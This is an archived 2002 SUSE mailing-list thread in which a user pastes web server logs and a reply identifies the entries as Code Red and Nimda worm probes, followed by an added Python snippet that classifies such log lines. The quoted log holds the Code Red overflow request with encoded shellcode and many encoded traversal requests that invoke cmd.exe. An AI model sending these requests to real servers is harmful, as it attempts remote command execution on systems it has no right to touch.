Mailinglist Archive: opensuse (3644 mails)
Re: [SLE] web log
- From: James Bliss <bliss@xxxxxxxxx>
- Date: Tue, 12 Mar 2002 17:46:34 -0600
- Message-id: <HFPLB0NZX685SOB6TPUQ34ZZWVRD0.3c8e935a@familyroom>
These are the Code Red / Nimda attack signatures. You can just ignore them
since you are not at risk. I know, they really clutter up the logs though.
I do not think there is a way to keep them out of the log; on the security list
they went around on this and I do not remember any specific resolution
which would keep them out of the log files. (Anyone know of a way to
avoid logging these entries?)
Jim
03/12/02 05:19:04 PM, Landy Roman <landy@xxxxxxxxxxxxxxx> wrote:
I saw these entries in my weblog. Anything I can do against this?
61.182.248.223 - - [12/Mar/2002:07:47:44 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331
64.133.27.115 - - [12/Mar/2002:10:23:19 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:20 -0500] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:21 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:22 -0500] "GET
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 294
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
64.133.27.115 - - [12/Mar/2002:10:23:23 -0500] "GET
/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476
202.5.152.215 - - [12/Mar/2002:12:01:15 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331
146.155.10.241 - - [12/Mar/2002:12:50:04 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331
212.205.99.248 - - [12/Mar/2002:13:07:02 -0500] "GET
/default.ida?
NNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%
u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u
0000%u00=a HTTP/1.0" 400 331
--
To unsubscribe send e-mail to suse-linux-e-unsubscribe@xxxxxxxx
For additional commands send e-mail to suse-linux-e-help@xxxxxxxx
Also check the FAQ at http://www.suse.com/support/faq and the
archives at http://lists.suse.com
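
Added example, not part of the original thread: one way to separate the Code Red / Nimda probe lines discussed above from the rest of an access log, so the clutter can be counted per source instead of read line by line. The function names and the sample lines are constructed for illustration; the signatures are only the request paths visible in the quoted log, and probes answered with a 2xx status are reported separately rather than counted as noise.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "request" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+')

def classify(request):
    """Return 'code-red', 'nimda' or None for a CLF request string."""
    parts = request.split(" ")
    if len(parts) < 2:
        return None
    target = parts[1].lower()
    path = target.split("?", 1)[0]
    # Code Red: /default.ida with %u-encoded data in the query string.
    if path.endswith("/default.ida") and "%u" in target:
        return "code-red"
    # Nimda: probes for root.exe / cmd.exe, directly or via encoded "../".
    if path.endswith(("/root.exe", "/cmd.exe")):
        return "nimda"
    return None

def triage(lines):
    """Return (kept, noise, answered).

    kept: lines that are not worm probes (unparsable lines are kept too).
    noise: Counter keyed by (host, worm) for rejected probes.
    answered: probe lines that got a 2xx status and should not be ignored.
    """
    kept, noise, answered = [], Counter(), []
    for line in lines:
        m = CLF.match(line)
        label = classify(m.group(2)) if m else None
        if label is None:
            kept.append(line)
        elif m.group(3).startswith("2"):
            answered.append(line)
        else:
            noise[(m.group(1), label)] += 1
    return kept, noise, answered

# Constructed sample lines (documentation addresses, shortened query string).
SAMPLE = [
    '192.0.2.10 - - [12/Mar/2002:07:47:44 -0500] "GET /default.ida?' + "N" * 40 + '%u9090%u6858=a HTTP/1.0" 400 331',
    '198.51.100.7 - - [12/Mar/2002:10:23:19 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 401 476',
    '198.51.100.7 - - [12/Mar/2002:10:23:20 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 476',
    '198.51.100.7 - - [12/Mar/2002:10:23:22 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310',
    '203.0.113.5 - - [12/Mar/2002:10:30:00 -0500] "GET /index.html HTTP/1.0" 200 1043',
]
```
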